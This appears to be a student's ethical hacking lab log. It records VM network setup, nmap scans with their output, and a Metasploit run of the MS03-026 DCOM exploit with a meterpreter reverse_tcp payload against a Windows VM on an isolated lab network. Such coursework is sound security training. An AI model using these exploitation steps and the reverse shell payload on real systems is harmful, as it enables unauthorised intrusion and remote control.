ethical hacking

ethical hacking worksheets

e-hacking ws responses

unit themes: theory

HTB academy

pentest log

hacking workshops

Explore

pentest log

friday 19

⁠

re-imported kali VM (newest 2021 version may have different settings from 2020.4)

checked that all VM using NatNetwork

⁠

launched KaliVM and msVM

logged in to both VM

obtained IP addresses for both machinesusing igconfig msVM is 10.0.2.4 KaliVM is 10.0.2.15

pinged from KaliVM to msVM successfully

created target.txt file on msVM and inserted some text, saved the file in home directory

used touch and then nano editor

⁠

nmap

carried out nmap scan of target

zenmap not available

explore legion instead runs in sudo

legion allows session result to be saved to file

auto screenshots services such as web server home page, tomcat home page, db and ftp

list of cve vulnerabilities with hyperlink to cve database

⁠

setting up metasploit framework

find an exploit

deploy exploit

configure

deliver payload

explore target using shell

finishing metasploitable session

⁠

monday 22

Setting up Kali and Windows

Kali settings: internal network

⁠

Windows sp0: network

⁠

Secret file on Windows

⁠

TCP/IP properties for Windows

⁠

Kali Net settings(right click network icon in top right)

⁠

check for confirmation of network (manual setting for ip4)

Testing Kali - Windows network connection: ping

⁠

Hacking Windows from Kali

nmap scan needs sudo

sudo nmap -sN 10.0.2.0/24

⁠

port scanner

sudo nmap -PS 10.0.2.16

[sudo] password for kali:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:19 EDT

Nmap scan report for 10.0.2.16

Host is up (0.00032s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

3389/tcp open ms-wbt-server

5000/tcp open upnp

MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds

fingerprint the target

└─$ sudo nmap -O -osscan-guess 10.0.2.16 1 ⚙

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:22 EDT

Nmap scan report for 10.0.2.16

Host is up (0.00055s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

3389/tcp open ms-wbt-server

5000/tcp open upnp

MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Microsoft Windows 2000|XP

OS CPE: cpe:/o:microsoft:windows_2000::- cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::- cpe:/o:microsoft:windows_xp::sp1

OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds

Vulnerability

⁠

http://www.openvas.org/⁠

⁠

Exploitation

msfconsole

search 'MS03-026'

use exploit/windows/dcerpc/ms03_026_dcom

show options

set rhost 10.0.2.16

set lhost 10.0.2.15

show payloads

(displays 183 items of different categories in a wide listing)

set payload windows/meterpreter/reverse_tcp

exploit

(session closes / dies, windows closes and restarts)

Want to print your doc?
This is not the way.

Try clicking the ⋯ next to your doc name or using a keyboard shortcut (

CtrlP

) instead.